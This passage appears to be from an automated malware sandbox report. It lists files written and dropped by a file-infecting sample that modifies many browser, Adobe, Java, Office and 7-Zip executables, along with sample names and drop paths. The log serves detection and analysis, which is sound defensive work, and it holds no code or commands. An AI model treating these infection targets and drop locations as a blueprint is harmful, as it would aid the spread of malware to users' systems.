                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Infects executable files (exe, dll, sys, html)
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exeJump to behavior
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
